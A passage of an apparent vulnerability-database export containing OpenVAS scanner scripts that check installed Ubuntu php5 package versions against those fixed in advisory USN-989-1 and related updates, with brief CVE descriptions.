ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:17:43", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-989-1", "cvss3": {}, "published": "2010-09-22T00:00:00", "type": "openvas", "title": "Ubuntu Update for php5 vulnerabilities USN-989-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-1866", "CVE-2010-2094", "CVE-2010-1130", "CVE-2010-2950", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840501", "href": "http://plugins.openvas.org/nasl.php?oid=840501", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_989_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for php5 vulnerabilities USN-989-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Auke van Slooten discovered that PHP incorrectly handled certain xmlrpc\n requests. An attacker could exploit this issue to cause the PHP server to\n crash, resulting in a denial of service. This issue only affected Ubuntu\n 6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\n\n It was discovered that the pseudorandom number generator in PHP did not\n provide the expected entropy. An attacker could exploit this issue to\n predict values that were intended to be random, such as session cookies.\n This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10.\n (CVE-2010-1128)\n \n It was discovered that PHP did not properly handle directory pathnames that\n lacked a trailing slash character. An attacker could exploit this issue to\n bypass safe_mode restrictions. This issue only affected Ubuntu 6.06 LTS,\n 8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\n \n Grzegorz Stachowiak discovered that the PHP session extension did not\n properly handle semicolon characters. An attacker could exploit this issue\n to bypass safe_mode restrictions. This issue only affected Ubuntu 8.04 LTS,\n 9.04 and 9.10. (CVE-2010-1130)\n \n Stefan Esser discovered that PHP incorrectly decoded remote HTTP chunked\n encoding streams. An attacker could exploit this issue to cause the PHP\n server to crash and possibly execute arbitrary code with application\n privileges. This issue only affected Ubuntu 10.04 LTS. (CVE-2010-1866)\n \n Mateusz Kocielski discovered that certain PHP SQLite functions incorrectly\n handled empty SQL queries. An attacker could exploit this issue to possibly\n execute arbitrary code with application privileges. (CVE-2010-1868)\n \n Mateusz Kocielski discovered that PHP incorrectly handled certain arguments\n to the fnmatch function. An attacker could exploit this flaw and cause the\n PHP server to consume all available stack memory, resulting in a denial of\n service. (CVE-2010-1917)\n \n Stefan Esser discovered that PHP incorrectly handled certain strings in the\n phar extension. An attacker could exploit this flaw to possibly view\n sensitive information. This issue only affected Ubuntu 10.04 LTS.\n (CVE-2010-2094, CVE-2010-2950)\n \n Stefan Esser discovered that PHP incorrectly handled deserialization of\n SPLObjectStorage objects. A remote attacker could exploit this issue to\n view sensitive information and possibly execute arbitrary code with\n application privileges. This issue only affected Ubuntu 8.04 LTS, 9.04,\n 9.10 and 10.04 LTS. (CVE-2010-2225)\n \n It was discovered that PHP incorrectly filtered ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-989-1\";\ntag_affected = \"php5 vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.04 ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-989-1/\");\n script_id(840501);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-22 08:32:53 +0200 (Wed, 22 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"989-1\");\n script_cve_id(\"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1917\", \"CVE-2010-2094\", \"CVE-2010-2225\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3065\");\n script_name(\"Ubuntu Update for php5 vulnerabilities USN-989-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.10.dfsg.1-2ubuntu6.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.2-1ubuntu3.19\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.2-1ubuntu4.5\", 